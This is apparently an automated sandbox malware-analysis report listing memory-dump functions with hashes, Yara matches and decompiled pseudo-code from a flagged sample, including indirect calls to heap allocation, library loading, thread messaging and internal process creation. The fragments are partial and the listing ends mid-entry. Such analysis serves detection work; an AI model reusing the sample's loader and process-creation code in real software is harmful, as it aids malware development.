                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409AA0, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A620, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				intOrPtr _t11;
				void* _t15;

				_t7 = _a4;
				_t11 =  *((intOrPtr*)(_a4 + 0x10));
				E0041AF50(_t15, _t7, _t7 + 0xc70, _t11, 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}






                                                      0x0041a623
                                                      0x0041a626
                                                      0x0041a637
                                                      0x0041a642
                                                      0x0041a64d
                                                      0x0041a651

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A5AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 50%
                                                      			E0041A5AA(intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t29;
				void* _t30;
				intOrPtr* _t33;
				void* _t35;
				signed int _t39;

				if(_t39 * 0x10 != 0) {
					_push(_t30);
					E0041AF50(_t29, _t12, _t12 + 0xc70, _t21, 0, 0x34);
					_t11 =  &_a12; // 0x414526
					_t15 = RtlAllocateHeap( *_t11, _a16, _a20); // executed
					return _t15;
				} else {
					asm("invalid");
					_t16 = _a4;
					_t2 = _t16 + 0x10; // 0xffeeffee
					_t3 = _t16 + 0xc68; // 0x10c68
					_t33 = _t3;
					E0041AF50(_t29, _a4, _t33,  *_t2, 0, 0x32);
					_t20 =  *((intOrPtr*)( *_t33))(_a8, _a12, _a16, _a20, _t30, _t35); // executed
					return _t20;
				}
			}












                                                      0x0041a5ad
                                                      0x0041a629
                                                      0x0041a637
                                                      0x0041a642
                                                      0x0041a64d
                                                      0x0041a651
                                                      0x0041a5af
                                                      0x0041a5af
                                                      0x0041a5b3
                                                      0x0041a5b6
                                                      0x0041a5bf
                                                      0x0041a5bf
                                                      0x0041a5c7
                                                      0x0041a5e1
                                                      0x0041a5e5
                                                      0x0041a5e5

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 8a52fe31c40a34a916130df937ca96f10d009718dddc752f356828dfef02f5f0
                                                      • Instruction ID: ac391626b21bb15c078e3a0a36c486e54829ed1ae3c937e6c53b3867179d8e16
                                                      • Opcode Fuzzy Hash: 8a52fe31c40a34a916130df937ca96f10d009718dddc752f356828dfef02f5f0
                                                      • Instruction Fuzzy Hash: 20E08CB16011046BEB20EF558C02EE7375CEF84368F10454AFD1C6B241C130E8258AF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACD4, Relevance: 1.6, APIs: 1, Instructions: 89libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 16%
                                                      			E0040ACD4(void* __eax) {

				asm("repe mov dl, 0x9d");
				asm("loopne 0xffffff8c");
				if (__eax + 0xb275f536 >= 0) goto L7;
			}



                                                      0x0040acd9
                                                      0x0040acdd
                                                      0x0040acdf

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction ID: 5bd14da9ace7145ebf6ea5a77f12ca53bc4090f51078a18f40ab6c25d6b1d2b0
                                                      • Opcode Fuzzy Hash: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction Fuzzy Hash: DB218A3590C24A5BEF20DF54D888EF9B761DF11308F0541ABEC48AB382F5379928C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                      0x00408310
                                                      0x0040831f
                                                      0x00408323
                                                      0x0040832e
                                                      0x0040833e
                                                      0x0040834e
                                                      0x00408353
                                                      0x0040835a
                                                      0x0040835d
                                                      0x0040836a
                                                      0x0040836c
                                                      0x0040836e
                                                      0x0040838b
                                                      0x0040838b
                                                      0x00000000
                                                      0x0040838d
                                                      0x00408392

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                      • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                      • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                      • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A6CD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E0041A6CD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t23;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;
				void* _t38;

				_t17 = _a4;
				_t2 = _t17 + 0xa14; // 0xfffde485
				_t3 = _t17 + 0xc80; // 0x4099a9
				_t36 = _t3;
				E0041AF50(_t34, _a4, _t36,  *_t2, 0, 0x37);
				_t23 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t35, _t38); // executed
				return _t23;
			}








                                                      0x0041a6d3
                                                      0x0041a6d6
                                                      0x0041a6e2
                                                      0x0041a6e2
                                                      0x0041a6ea
                                                      0x0041a724
                                                      0x0041a728

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A724
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 163b16cc389c672efcd4f49754a503ccfa88b90f6de5149e698ff7def424e9a0
                                                      • Instruction ID: aee240f7e5d65c16bbd5e77ecc7b3401aea7d3332f138cb3f8f8da0622377656
                                                      • Opcode Fuzzy Hash: 163b16cc389c672efcd4f49754a503ccfa88b90f6de5149e698ff7def424e9a0
                                                      • Instruction Fuzzy Hash: E801AFB2210108AFCB54CF99DC81EEB37A9AF8C354F158258FA1DE7244D630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A6D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E0041A6D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				void* _t33;
				intOrPtr* _t34;

				_t16 = _a4;
				_t2 = _t16 + 0xa14; // 0xfffde485
				_t3 = _t16 + 0xc80; // 0x4099a9
				_t34 = _t3;
				E0041AF50(_t33, _a4, _t34,  *_t2, 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






                                                      0x0041a6d3
                                                      0x0041a6d6
                                                      0x0041a6e2
                                                      0x0041a6e2
                                                      0x0041a6ea
                                                      0x0041a724
                                                      0x0041a728

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A724
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                                      • Instruction ID: f458879f39d616446e0b62b72d70e0ee17155def2a50aea8c1d06961fa513d3f
                                                      • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
